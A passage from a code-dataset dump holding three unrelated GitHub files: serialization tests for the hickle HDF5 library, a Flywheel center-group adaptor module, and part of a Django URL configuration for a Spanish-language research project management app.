0, 3, 4.5, 11.2])\n dump(list_obj, test_file_name, mode,**compression_kwargs)\n list_hkl = load(test_file_name)\n try:\n assert isinstance(list_hkl, set)\n assert list_obj == list_hkl\n except AssertionError:\n print(type(list_obj))\n print(type(list_hkl))\n raise\n\n\ndef test_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading numpy array \"\"\"\n mode = 'w'\n dtypes = ['float32', 'float64', 'complex64', 'complex128']\n\n for dt in dtypes:\n array_obj = np.ones(8, dtype=dt)\n dump(array_obj, test_file_name, mode,**compression_kwargs)\n array_hkl = load(test_file_name)\n try:\n assert array_hkl.dtype == array_obj.dtype\n assert np.all((array_hkl, array_obj))\n except AssertionError:\n print(array_hkl)\n print(array_obj)\n raise\n\n\ndef test_masked(test_file_name,compression_kwargs):\n \"\"\" Test masked numpy array \"\"\"\n mode = 'w'\n a = np.ma.array([1, 2, 3, 4], dtype='float32', mask=[0, 1, 0, 0])\n\n dump(a, test_file_name, mode,**compression_kwargs)\n a_hkl = load(test_file_name)\n\n try:\n assert a_hkl.dtype == a.dtype\n assert np.all((a_hkl, a))\n except AssertionError:\n print(a_hkl)\n print(a)\n raise\n\n\ndef test_object_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a NumPy array containing non-NumPy objects.\n\n https://github.com/telegraphic/hickle/issues/90\"\"\"\n\n # VisibleDeprecationWarning from newer numpy versions\n #np_array_data = np.array([[NESTED_DICT], ('What is this?',), {1, 2, 3, 7, 1}])\n arr = np.array([NESTED_DICT])#, ('What is this?',), {1, 2, 3, 7, 1}])\n dump(arr, test_file_name,**compression_kwargs)\n arr_hkl = load(test_file_name)\n assert np.all(arr == arr_hkl)\n\n arr2 = np.array(NESTED_DICT)\n dump(arr2, test_file_name,**compression_kwargs)\n arr_hkl2 = load(test_file_name)\n assert np.all(arr2 == arr_hkl2)\n\n\ndef test_string_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading NumPy arrays containing Python 3 strings. \"\"\"\n\n arr = np.array([\"1313e\", \"was\", \"maybe?\", \"here\"])\n dump(arr, test_file_name,**compression_kwargs)\n arr_hkl = load(test_file_name)\n assert np.all(arr == arr_hkl)\n\n\ndef test_list_object_numpy(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a list of NumPy arrays with objects.\n\n https://github.com/telegraphic/hickle/issues/90\"\"\"\n\n # VisibleDeprecationWarning from newer numpy versions\n lst = [np.array(NESTED_DICT)]#, np.array([('What is this?',),\n # {1, 2, 3, 7, 1}])]\n dump(lst, test_file_name,**compression_kwargs)\n lst_hkl = load(test_file_name)\n assert np.all(lst[0] == lst_hkl[0])\n #assert np.all(lst[1] == lst_hkl[1])\n\n\ndef test_dict(test_file_name,compression_kwargs):\n \"\"\" Test dictionary dumping and loading \"\"\"\n mode = 'w'\n\n dd = {\n 'name': b'Danny',\n 'age': 28,\n 'height': 6.1,\n 'dork': True,\n 'nums': [1, 2, 3],\n 'narr': np.array([1, 2, 3]),\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n for k in dd.keys():\n try:\n assert k in dd_hkl.keys()\n\n if isinstance(dd[k], np.ndarray):\n assert np.all((dd[k], dd_hkl[k]))\n else:\n pass\n assert isinstance(dd_hkl[k], dd[k].__class__)\n except AssertionError:\n print(k)\n print(dd_hkl[k])\n print(dd[k])\n print(type(dd_hkl[k]), type(dd[k]))\n raise\n\n\ndef test_odict(test_file_name,compression_kwargs):\n \"\"\" Test ordered dictionary dumping and loading\n\n https://github.com/telegraphic/hickle/issues/65\"\"\"\n mode = 'w'\n\n od = odict(((3, [3, 0.1]), (7, [5, 0.1]), (5, [3, 0.1])))\n dump(od, test_file_name, mode,**compression_kwargs)\n od_hkl = load(test_file_name)\n\n assert od.keys() == od_hkl.keys()\n\n for od_item, od_hkl_item in zip(od.items(), od_hkl.items()):\n assert od_item == od_hkl_item\n\n\ndef test_empty_dict(test_file_name,compression_kwargs):\n \"\"\" Test empty dictionary dumping and loading\n\n https://github.com/telegraphic/hickle/issues/91\"\"\"\n mode = 'w'\n\n dump({}, test_file_name, mode,**compression_kwargs)\n assert load(test_file_name) == {}\n\n\n\n# TODO consider converting to parameterized test\n# or enable implicit parameterizing of all tests\n# though compression_kwargs fixture providing\n# various combinations of compression and chunking\n# related keywords\n@pytest.mark.no_compression\ndef test_compression(test_file_name):\n \"\"\" Test compression on datasets\"\"\"\n\n mode = 'w'\n dtypes = ['int32', 'float32', 'float64', 'complex64', 'complex128']\n\n comps = [None, 'gzip', 'lzf']\n\n for dt in dtypes:\n for cc in comps:\n array_obj = np.ones(32768, dtype=dt)\n dump(array_obj, test_file_name, mode, compression=cc)\n print(cc, os.path.getsize(test_file_name))\n array_hkl = load(test_file_name)\n try:\n assert array_hkl.dtype == array_obj.dtype\n assert np.all((array_hkl, array_obj))\n except AssertionError:\n print(array_hkl)\n print(array_obj)\n raise\n\n\ndef test_dict_int_key(test_file_name,compression_kwargs):\n \"\"\" Test for dictionaries with integer keys \"\"\"\n mode = 'w'\n\n dd = {\n 0: \"test\",\n 1: \"test2\"\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n load(test_file_name)\n\n\ndef test_dict_nested(test_file_name,compression_kwargs):\n \"\"\" Test for dictionaries with integer keys \"\"\"\n mode = 'w'\n\n dd = NESTED_DICT\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n ll_hkl = dd_hkl[\"level1_3\"][\"level2_1\"][\"level3_1\"]\n ll = dd[\"level1_3\"][\"level2_1\"][\"level3_1\"]\n assert ll == ll_hkl\n\n\ndef test_masked_dict(test_file_name,compression_kwargs):\n \"\"\" Test dictionaries with masked arrays \"\"\"\n\n filename, mode = 'test.h5', 'w'\n\n dd = {\n \"data\": np.ma.array([1, 2, 3], mask=[True, False, False]),\n \"data2\": np.array([1, 2, 3, 4, 5])\n }\n\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n for k in dd.keys():\n try:\n assert k in dd_hkl.keys()\n if isinstance(dd[k], np.ndarray):\n assert np.all((dd[k], dd_hkl[k]))\n elif isinstance(dd[k], np.ma.MaskedArray):\n print(dd[k].data)\n print(dd_hkl[k].data)\n assert np.allclose(dd[k].data, dd_hkl[k].data)\n assert np.allclose(dd[k].mask, dd_hkl[k].mask)\n\n assert isinstance(dd_hkl[k], dd[k].__class__)\n\n except AssertionError:\n print(k)\n print(dd_hkl[k])\n print(dd[k])\n print(type(dd_hkl[k]), type(dd[k]))\n raise\n\n\ndef test_np_float(test_file_name,compression_kwargs):\n \"\"\" Test for singular np dtypes \"\"\"\n mode = 'w'\n\n dtype_list = (np.float16, np.float32, np.float64,\n np.complex64, np.complex128,\n np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64)\n\n for dt in dtype_list:\n\n dd = dt(1)\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n assert dd == dd_hkl\n assert dd.dtype == dd_hkl.dtype\n\n dd = {}\n for dt in dtype_list:\n dd[str(dt)] = dt(1.0)\n dump(dd, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd)\n for dt in dtype_list:\n assert dd[str(dt)] == dd_hkl[str(dt)]\n\n\n# TODO consider converting to parameterized test\n# or enable implicit parameterizing of all tests\n# though compression_kwargs fixture providing\n# various combinations of compression and chunking\n# related keywords\n@pytest.mark.no_compression\ndef test_comp_kwargs(test_file_name):\n \"\"\" Test compression with some kwargs for shuffle and chunking \"\"\"\n\n mode = 'w'\n dtypes = ['int32', 'float32', 'float64', 'complex64', 'complex128']\n\n comps = [None, 'gzip', 'lzf']\n chunks = [(100, 100), (250, 250)]\n shuffles = [True, False]\n scaleoffsets = [0, 1, 2]\n\n for dt in dtypes:\n for cc in comps:\n for ch in chunks:\n for sh in shuffles:\n for so in scaleoffsets:\n kwargs = {\n 'compression': cc,\n 'dtype': dt,\n 'chunks': ch,\n 'shuffle': sh,\n 'scaleoffset': so\n }\n array_obj = NESTED_DICT\n dump(array_obj, test_file_name, mode, compression=cc)\n print(kwargs, os.path.getsize(test_file_name))\n load(test_file_name)\n\n\ndef test_list_numpy(test_file_name,compression_kwargs):\n \"\"\" Test converting a list of numpy arrays \"\"\"\n\n mode = 'w'\n\n a = np.ones(1024)\n b = np.zeros(1000)\n c = [a, b]\n\n dump(c, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd_hkl)\n\n assert isinstance(dd_hkl, list)\n assert isinstance(dd_hkl[0], np.ndarray)\n\n\ndef test_tuple_numpy(test_file_name,compression_kwargs):\n \"\"\" Test converting a list of numpy arrays \"\"\"\n\n mode = 'w'\n\n a = np.ones(1024)\n b = np.zeros(1000)\n c = (a, b, a)\n\n dump(c, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n\n print(dd_hkl)\n\n assert isinstance(dd_hkl, tuple)\n assert isinstance(dd_hkl[0], np.ndarray)\n\n\ndef test_numpy_dtype(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a NumPy dtype \"\"\"\n\n dtype = np.dtype('int64')\n dump(dtype, test_file_name,**compression_kwargs)\n dtype_hkl = load(test_file_name)\n assert dtype == dtype_hkl\n\n\ndef test_none(test_file_name,compression_kwargs):\n \"\"\" Test None type hickling \"\"\"\n\n mode = 'w'\n\n a = None\n\n dump(a, test_file_name, mode,**compression_kwargs)\n dd_hkl = load(test_file_name)\n print(a)\n print(dd_hkl)\n\n assert isinstance(dd_hkl, type(None))\n\n\ndef test_list_order(test_file_name,compression_kwargs):\n \"\"\" https://github.com/telegraphic/hickle/issues/26 \"\"\"\n d = [np.arange(n + 1) for n in range(20)]\n dump(d, test_file_name,**compression_kwargs)\n d_hkl = load(test_file_name)\n\n try:\n for ii, xx in enumerate(d):\n assert d[ii].shape == d_hkl[ii].shape\n for ii, xx in enumerate(d):\n assert np.allclose(d[ii], d_hkl[ii])\n except AssertionError:\n print(d[ii], d_hkl[ii])\n raise\n\n\ndef test_embedded_array(test_file_name,compression_kwargs):\n \"\"\" See https://github.com/telegraphic/hickle/issues/24 \"\"\"\n\n d_orig = [[np.array([10., 20.]), np.array([10, 20, 30])],\n [np.array([10, 2]), np.array([1.])]]\n dump(d_orig, test_file_name,**compression_kwargs)\n d_hkl = load(test_file_name)\n\n for ii, xx in enumerate(d_orig):\n for jj, yy in enumerate(xx):\n assert np.allclose(d_orig[ii][jj], d_hkl[ii][jj])\n\n print(d_hkl)\n print(d_orig)\n\n\n##############\n# NEW TESTS #\n###############\ndef generate_nested():\n a = [1, 2, 3]\n b = [a, a, a]\n c = [a, b, 's']\n d = [a, b, c, c, a]\n e = [d, d, d, d, 1]\n f = {'a': a, 'b': b, 'e': e}\n g = {'f': f, 'a': e, 'd': d}\n h = {'h': g, 'g': f}\n z = [f, a, b, c, d, e, f, g, h, g, h]\n a = np.array([1, 2, 3, 4])\n b = set([1, 2, 3, 4, 5])\n c = (1, 2, 3, 4, 5)\n d = np.ma.array([1, 2, 3, 4, 5, 6, 7, 8])\n z = {'a': a, 'b': b, 'c': c, 'd': d, 'z': z}\n return z\n\ndef test_dump_nested(test_file_name,compression_kwargs):\n \"\"\" Dump a complicated nested object to HDF5\n \"\"\"\n z = generate_nested()\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\ndef test_ndarray(test_file_name,compression_kwargs):\n a = np.array([1, 2, 3])\n b = np.array([2, 3, 4])\n z = (a, b)\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\n\ndef test_ndarray_masked(test_file_name,compression_kwargs):\n a = np.ma.array([1, 2, 3])\n b = np.ma.array([2, 3, 4], mask=[True, False, True])\n z = (a, b)\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\n\ndef test_simple_dict(test_file_name,compression_kwargs):\n a = {'key1': 1, 'key2': 2}\n\n dump(a, test_file_name,**compression_kwargs)\n z = load(test_file_name)\n\n pprint(a)\n pprint(z)\n\n\ndef test_complex_dict(test_file_name,compression_kwargs):\n a = {'akey': 1, 'akey2': 2}\n c = {'ckey': \"hello\", \"ckey2\": \"hi there\"}\n z = {'zkey1': a, 'zkey2': a, 'zkey3': c}\n\n print(\"Original:\")\n pprint(z)\n dump(z, test_file_name, mode='w',**compression_kwargs)\n\n print(\"\\nReconstructed:\")\n z = load(test_file_name)\n pprint(z)\n\ndef test_complex(test_file_name,compression_kwargs):\n \"\"\" Test complex value dtype is handled correctly\n\n https://github.com/telegraphic/hickle/issues/29 \"\"\"\n\n data = {\"A\": 1.5, \"B\": 1.5 + 1j, \"C\": np.linspace(0, 1, 4) + 2j}\n dump(data, test_file_name,**compression_kwargs)\n data2 = load(test_file_name)\n for key in data.keys():\n assert isinstance(data[key], data2[key].__class__)\n\n\ndef test_nonstring_keys(test_file_name,compression_kwargs):\n \"\"\" Test that keys are reconstructed back to their original datatypes\n https://github.com/telegraphic/hickle/issues/36\n \"\"\"\n\n data = {\n u'test': 123,\n 'def': [b'test'],\n 'hik': np.array([1, 2, 3]),\n 0: 0,\n True: ['test'],\n 1.1: 'hey',\n 1j: 'complex_hashable',\n (1, 2): 'boo',\n ('A', 17.4, 42): [1, 7, 'A'],\n (): '1313e was here',\n '0': 0,\n None: None\n }\n\n print(data)\n dump(data, test_file_name,**compression_kwargs)\n data2 = load(test_file_name)\n print(data2)\n\n for key in data.keys():\n assert key in data2.keys()\n\n print(data2)\n\n@pytest.mark.no_compression\ndef test_scalar_compression(test_file_name):\n \"\"\" Test bug where compression causes a crash on scalar datasets\n\n (Scalars are incompressible!)\n https://github.com/telegraphic/hickle/issues/37\n \"\"\"\n data = {'a': 0, 'b': np.float(2), 'c': True}\n\n dump(data, test_file_name, compression='gzip')\n data2 = load(test_file_name)\n\n print(data2)\n for key in data.keys():\n assert isinstance(data[key], data2[key].__class__)\n\n\ndef test_bytes(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a string. PYTHON3 ONLY \"\"\"\n\n mode = 'w'\n string_obj = b\"The quick brown fox jumps over the lazy dog\"\n dump(string_obj, test_file_name, mode,**compression_kwargs)\n string_hkl = load(test_file_name)\n print(type(string_obj))\n print(type(string_hkl))\n assert isinstance(string_hkl, bytes)\n assert string_obj == string_hkl\n\n\ndef test_np_scalar(test_file_name,compression_kwargs):\n \"\"\" Numpy scalar datatype\n\n https://github.com/telegraphic/hickle/issues/50\n \"\"\"\n\n r0 = {'test': np.float64(10.)}\n dump(r0, test_file_name,**compression_kwargs)\n r = load(test_file_name)\n print(r)\n assert isinstance(r0['test'], r['test'].__class__)\n\n\ndef test_slash_dict_keys(test_file_name,compression_kwargs):\n \"\"\" Support for having slashes in dict keys\n\n https://github.com/telegraphic/hickle/issues/124\"\"\"\n dct = {'a/b': [1, '2'], 1.4: 3}\n\n dump(dct, test_file_name, 'w',**compression_kwargs)\n dct_hkl = load(test_file_name)\n\n assert isinstance(dct_hkl, dict)\n for key, val in dct_hkl.items():\n assert val == dct.get(key)\n\n # Check that having backslashes in dict keys will serialize the dict\n dct2 = {'a\\\\b': [1, '2'], 1.4: 3}\n with pytest.warns(None) as not_expected:\n dump(dct2, test_file_name,**compression_kwargs)\n assert not not_expected\n\n\n# %% MAIN SCRIPT\nif __name__ == '__main__':\n \"\"\" Some tests and examples \"\"\"\n from _pytest.fixtures import FixtureRequest\n\n for filename in test_file_name(FixtureRequest(test_np_scalar)):\n test_np_scalar(filename)\n for filename in test_file_name(FixtureRequest(test_scalar_compression)):\n test_scalar_compression(filename)\n for filename in test_file_name(FixtureRequest(test_complex)):\n test_complex(filename)\n for filename in test_file_name(FixtureRequest(test_none)):\n test_none(filename)\n for filename in test_file_name(FixtureRequest(test_masked_dict)):\n test_masked_dict(filename)\n for filename in test_file_name(FixtureRequest(test_list)):\n test_list(filename)\n for filename in test_file_name(FixtureRequest(test_set)):\n test_set(filename)\n for filename in test_file_name(FixtureRequest(test_numpy)):\n test_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_dict)):\n test_dict(filename)\n for filename in test_file_name(FixtureRequest(test_odict)):\n test_odict(filename)\n for filename in test_file_name(FixtureRequest(test_empty_dict)):\n test_empty_dict(filename)\n for filename in test_file_name(FixtureRequest(test_compression)):\n test_compression(filename)\n for filename in test_file_name(FixtureRequest(test_masked)):\n test_masked(filename)\n for filename in test_file_name(FixtureRequest(test_dict_nested)):\n test_dict_nested(filename)\n for filename in test_file_name(FixtureRequest(test_comp_kwargs)):\n test_comp_kwargs(filename)\n for filename in test_file_name(FixtureRequest(test_list_numpy)):\n test_list_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_tuple_numpy)):\n test_tuple_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_list_order)):\n test_list_order(filename)\n for filename in test_file_name(FixtureRequest(test_embedded_array)):\n test_embedded_array(filename)\n for filename in test_file_name(FixtureRequest(test_np_float)):\n test_np_float(filename)\n for filename in test_file_name(FixtureRequest(test_string)):\n test_string(filename)\n for filename in test_file_name(FixtureRequest(test_nonstring_keys)):\n test_nonstring_keys(filename)\n for filename in test_file_name(FixtureRequest(test_bytes)):\n test_bytes(filename)\n\n # NEW TESTS\n for filename in test_file_name(FixtureRequest(test_dump_nested)):\n test_dump_nested(filename)\n for filename in test_file_name(FixtureRequest(test_ndarray)):\n test_ndarray(filename)\n for filename in test_file_name(FixtureRequest(test_ndarray_masked)):\n test_ndarray_masked(filename)\n for filename in test_file_name(FixtureRequest(test_simple_dict)):\n test_simple_dict(filename)\n for filename in test_file_name(FixtureRequest(test_complex_dict)):\n test_complex_dict(filename)\n for filename in test_file_name(FixtureRequest(test_dict_int_key)):\n test_dict_int_key(filename)\n for filename in test_file_name(FixtureRequest(test_local_func)):\n test_local_func(filename)\n for filename in test_file_name(FixtureRequest(test_slash_dict_keys)):\n test_slash_dict_keys(filename)\n test_invalid_file()\n for filename in test_file_name(FixtureRequest(test_non_empty_group)):\n test_non_empty_group(filename)\n for filename in test_file_name(FixtureRequest(test_numpy_dtype)):\n test_numpy_dtype(filename)\n for filename in test_file_name(FixtureRequest(test_object_numpy)):\n test_object_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_string_numpy)):\n test_string_numpy(filename)\n for filename in test_file_name(FixtureRequest(test_list_object_numpy)):\n test_list_object_numpy(filename)\n\n # Cleanup\n for filename in test_file_name(FixtureRequest(print)):\n print(filename)\n","repo_name":"telegraphic/hickle","sub_path":"hickle/tests/test_hickle.py","file_name":"test_hickle.py","file_ext":"py","file_size_in_byte":26652,"program_lang":"python","lang":"en","doc_type":"code","stars":473,"dataset":"github-code","pt":"66"} +{"seq_id":"26223571595","text":"\"\"\"Module for working with a Group representing a center.\n\nShould be used when starting from centers already created using\n`projects.CenterMappingAdaptor`.\n\"\"\"\nimport logging\nimport re\nfrom typing import Dict, List, Optional\n\nimport flywheel\nfrom flywheel_adaptor.flywheel_proxy import FlywheelProxy\nfrom flywheel_adaptor.group_adaptor import GroupAdaptor\nfrom flywheel_adaptor.project_adaptor import ProjectAdaptor\nfrom projects.template_project import TemplateProject\n\nlog = logging.getLogger(__name__)\n\n\nclass CenterGroup(GroupAdaptor):\n \"\"\"Defines an adaptor for a group representing a center.\"\"\"\n\n def __init__(self, *, group: flywheel.Group, proxy: FlywheelProxy) -> None:\n super().__init__(group=group, proxy=proxy)\n self.__datatypes: List[str] = []\n self.__ingest_stages = ['ingest', 'retrospective']\n\n def __get_matching_projects(self, prefix: str) -> List[ProjectAdaptor]:\n \"\"\"Returns the projects for the center with labels that match the\n prefix.\n\n Returns:\n the list of matching projects for the group\n \"\"\"\n pattern = re.compile(rf\"^{prefix}\")\n return [\n ProjectAdaptor(project=project, proxy=self.proxy())\n for project in self.projects() if pattern.match(project.label)\n ]\n\n def get_ingest_projects(self) -> List[ProjectAdaptor]:\n \"\"\"Returns the ingest projects for the center.\n\n Returns:\n the list of ingest projects\n \"\"\"\n projects: List[ProjectAdaptor] = []\n for stage in self.__ingest_stages:\n projects = projects + self.__get_matching_projects(f\"{stage}-\")\n\n return projects\n\n def get_accepted_project(self) -> Optional[ProjectAdaptor]:\n \"\"\"Returns the accepted project for this center.\n\n Returns:\n the project labeled 'accepted', None if there is none\n \"\"\"\n projects = self.__get_matching_projects('accepted')\n if not projects:\n return None\n\n return projects[0]\n\n def get_metadata_project(self) -> Optional[ProjectAdaptor]:\n \"\"\"Returns the metadata project for this center.\n\n Returns:\n the project labeled 'metadata', None if there is none\n \"\"\"\n projects = self.__get_matching_projects('metadata')\n if not projects:\n return None\n\n return projects[0]\n\n @classmethod\n def get_datatype(cls, *, stage: str, label: str) -> Optional[str]:\n \"\"\"Gets the datatype from a string with format `-`.\n\n Args:\n stage: stage name\n label: string with stage and datatype\n Returns:\n the datatype in the string if matches pattern. Otherwise, None\n \"\"\"\n pattern = re.compile(rf\"^{stage}-(\\w+)\")\n match = pattern.match(label)\n if not match:\n return None\n\n return match.group(1)\n\n def get_datatypes(self) -> List[str]:\n \"\"\"Returns the list of data types for the ingest projects of this\n center.\n\n Returns:\n list of datatype names\n \"\"\"\n if self.__datatypes:\n return self.__datatypes\n\n datatypes = []\n for stage in self.__ingest_stages:\n projects = self.__get_matching_projects(f\"{stage}-\")\n for project in projects:\n datatype = CenterGroup.get_datatype(stage=stage,\n label=project.label)\n if datatype:\n datatypes.append(datatype)\n self.__datatypes = list(set(datatypes))\n\n return self.__datatypes\n\n def apply_to_ingest(\n self, *, stage: str,\n template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the templates to the ingest stage projects in group.\n\n Expects that project labels match pattern\n `-`.\n For instance, `ingest-form` or `retrospective-dicom`.\n\n Args:\n stage: name of ingest stage\n template_map: map from datatype to stage to template project\n \"\"\"\n ingest_projects = self.__get_matching_projects(f\"{stage}-\")\n if not ingest_projects:\n log.warning('no ingest stage projects for group %s', self.label)\n return\n\n for project in ingest_projects:\n datatype = CenterGroup.get_datatype(stage=stage,\n label=project.label)\n if not datatype:\n log.info('ingest project %s has no datatype', project.label)\n continue\n\n self.__apply_to(stage=stage,\n template_map=template_map,\n project=project,\n datatype=datatype)\n\n def apply_to_accepted(\n self, template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the templates in the map to the accepted project in the\n group.\n\n Expects the accepted project to be named `accepted`.\n\n Args:\n template_map: map from datatype to stage to template project\n \"\"\"\n stage = 'accepted'\n accepted_projects = self.__get_matching_projects(stage)\n if not accepted_projects:\n log.warning('no accepted stage project in center group %s',\n self.label)\n return\n\n self.__apply_to(template_map=template_map,\n project=accepted_projects[0],\n stage=stage,\n datatype='all')\n\n def __apply_to(self, *, template_map: Dict[str, Dict[str,\n TemplateProject]],\n project: ProjectAdaptor, stage: str, datatype: str):\n \"\"\"Applies the template map to the project for stage and datatype.\n\n Args:\n template_map: map from datatype to stage to template project\n project: the destination project\n stage: the stage for the destination\n datatype: the datatype for the destination\n \"\"\"\n stage_map = template_map.get(datatype)\n if stage_map:\n template_project = stage_map.get(stage)\n if template_project:\n template_project.copy_to(project,\n value_map={\n 'adrc': self.label,\n 'project_id': project.id,\n 'site': self.proxy().get_site()\n })\n\n def apply_template_map(\n self, template_map: Dict[str, Dict[str, TemplateProject]]) -> None:\n \"\"\"Applies the template map to the pipeline projects within the center\n group.\n\n Args:\n template_map: map from datatype to stage to template project\n \"\"\"\n for stage in self.__ingest_stages:\n self.apply_to_ingest(stage=stage, template_map=template_map)\n\n self.apply_to_accepted(template_map)\n","repo_name":"naccdata/flywheel-gear-extensions","sub_path":"common/src/python/centers/center_group.py","file_name":"center_group.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10783520419","text":"# App del módulo de proyectos de investigación - URL's para SIGEPI\n#Autor: Laura Sofía Rodríguez Castillo - ORCID: 0000-0001-7873-8716\n# Coautor(a): Milton O. Castro Ch.\n#fecha 07-07-2022\n\nfrom django.urls import path\nfrom django.contrib.auth.views import *\n#from rest_framework.routers import DefaultRouter\nfrom modpry.app_regpry.views import *\nfrom modpry.app_regpry.func import *\nfrom modpry.app_regpry.urls import *\nfrom modpry.app_modpry.views import *\nfrom modpry.app_modpry.urls import *\nfrom modpry.app_crono.views import *\nfrom modpry.app_crono.func import *\nfrom modpry.app_crono.urls import *\nfrom modpry.app_evapry.views import *\nfrom modpry.app_evapry.func import *\nfrom modpry.app_evapry.urls import *\nfrom modpry.app_conve.views import *\nfrom modpry.app_conve.func import *\nfrom modpry.app_conve.urls import *\nfrom modpry.app_convo.views import *\nfrom modpry.app_convo.func import *\nfrom modpry.app_convo.urls import *\nfrom modpry.app_disinv.views import *\nfrom modpry.app_disinv.func import *\nfrom modpry.app_disinv.urls import *\n#from modpry.app_gespry.views import *\n#from modpry.app_gespry.urls import *\n#from modpry.app_gespry.func import *\n#from modpry.app_mlog.views import *\n#from modpry.app_mlog.func import *\n#from modpry.app_mlog.urls import *\nfrom modpry.app_recur.views import *\nfrom modpry.app_recur.func import *\nfrom modpry.app_recur.urls import *\nfrom modpry.app_regprgi.views import *\nfrom modpry.app_regprgi.func import *\nfrom modpry.app_regprgi.urls import *\nfrom .models import *\n\nurlpatterns = [\n # ------------------------------ URL's para convenios --------------------\n path('inicio',vst_conve().vst_inicio, name = 'ini_conve'), #inicio de la app de convenios\n path('crearconve/',vts_reg_conve.as_view(), name = 'crea_conve'), #Crea el convenio \n path('cnconve/', vst_ls_conve.as_view(), name='cn_conve'), #Lista de convenios\n path('cndetconve/', vst_ls_detconve.as_view(), name = 'cn_det_conve'),# Información de un convenio\n path('editconve//',vts_edit_conve.as_view(), name = 'edit_conve'), #Actualizar convenio\n path('archiconve/',fn_archi_conve, name = 'archi_conve'), #Archivar un convenio\n path('eliconve/',fn_eli_conve, name = 'eli_conve'),#Eliminar un convenio\n\n #------------------------------- URL's para convocatorias -------------------\n path('inicio',vst_convo().vst_inicio, name = 'ini_convo'), #inicio de la app de convocatorias\n path('inicio',vst_convo().vst_inicio, name = 'ini_convo'), #inicio de la app de convocatoria\n path('crearconvo/',vts_reg_convo.as_view(), name = 'crea_convo'), #Crea la convocatoria \n path('cnconvo/', vst_ls_convo.as_view(), name='cn_convo'), #Lista de convocatorias\n path('cndetconvo/', vst_ls_detconvo.as_view(), name = 'cn_det_convo'), # Información de una convocatoria\n path('editconvo//',vts_edit_convo.as_view(), name = 'edit_convo'), #Actualizar convocatoria\n path('archiconvo/',fn_archi_convo, name = 'archi_convo'), #Archivar una convocatoria\n path('eliconvo/',fn_eli_convo, name = 'eli_convo'),#Eliminar una convocatoria\n\n #URL para las funciones de un cronograma\n path('inicio',vst_crono().vst_inicio, name = 'ini_crono'), #inicio de la app de cronograma\n #URL para cronogramas\n path('creacrono/',vst_crea_crono.as_view(), name = 'creacrono'), #Crear cronograma \n path('cncrono/',vst_ls_crono.as_view(), name = 'vercrono'),#Lista de cronograma\n path('addcrono/',vst_add_crono.as_view(), name = 'addcrono'),#Añadir al cronograma\n path('editcrono//',vst_edit_crono.as_view(), name = 'edit_crono'),#Editar cronograma\n path('archicrono//',fn_archi_crono, name = 'archi_crono'), #Archivar cronograma\n path('elicrono//',fn_eli_crono, name = 'eli_crono'), #Eliminar cronograma\n #URL para etapas\n path('creaeta/',vst_crea_etapa.as_view(), name = 'creaeta'), #Crear etapa de un cronograma\n path('cndetcrono/',vst_ls_etapa.as_view(), name = 'veretapa'),#Lista de etapas\n path('editeta//',vst_edit_etapa.as_view(), name = 'edit_etapa'),#Editar etapa\n path('archieta//',fn_archi_etapa, name = 'archi_etapa'), #Archivar etapa\n path('elieta//',fn_eli_etapa, name = 'eli_etapa'), #Eliminar etapa\n #URL para fases\n path('creafase/',vst_crea_fase.as_view(), name = 'creafase'), #Crear fase de una etapa\n path('cndetcrono/',vst_ls_fase.as_view(), name = 'verfase'),#Lista de fases\n path('editfase//',vst_edit_fase.as_view(), name = 'edit_fase'),#Editar fase\n path('archifase//',fn_archi_fase, name = 'archi_fase'), #Archivar fase\n path('elifase//',fn_eli_fase, name = 'eli_fase'), #Eliminar fase\n #URL para procesos\n path('creaproc/',vst_crea_proc.as_view(), name = 'creaproc'), #Crea el proceso de una fase\n path('cndetcrono/',vst_ls_proc.as_view(), name = 'verproc'),#Lista de procesos\n path('editproc//',vst_edit_proc.as_view(), name = 'edit_proc'),#Editar procesos\n path('archiproc//',fn_archi_proceso, name = 'archi_proc'), #Archivar proceso\n path('eliproc//',fn_eli_proceso, name = 'eli_proc'), #Eliminar proceso\n #URL para tareas\n path('creatar/',vst_crea_tarea.as_view(), name = 'creatar'), #Crea la tarea de un proceso\n path('cndetcrono/',vst_ls_tarea.as_view(), name = 'vertarea'),#Lista de tareas\n path('editar//',vst_edit_tarea.as_view(), name = 'edit_tarea'),#Editar tarea\n path('architar//',fn_archi_tarea, name = 'archi_tar'), #Archivar tarea\n path('elitar//',fn_eli_tarea, name = 'eli_tar'), #Eliminar tarea\n #URL para actividades\n path('creacti/',vst_crea_acti.as_view(), name = 'creacti'), #Crea la actividad de una tarea\n path('cndetcrono/',vst_ls_acti.as_view(), name = 'veracti'),#Lista de actividades\n path('editacti//',vst_edit_acti.as_view(), name = 'edit_acti'),#Editar actividad\n path('archiacti//',fn_archi_acti, name = 'archi_acti'), #Archivar actividad\n path('eliacti//',fn_eli_acti, name = 'eli_acti'), 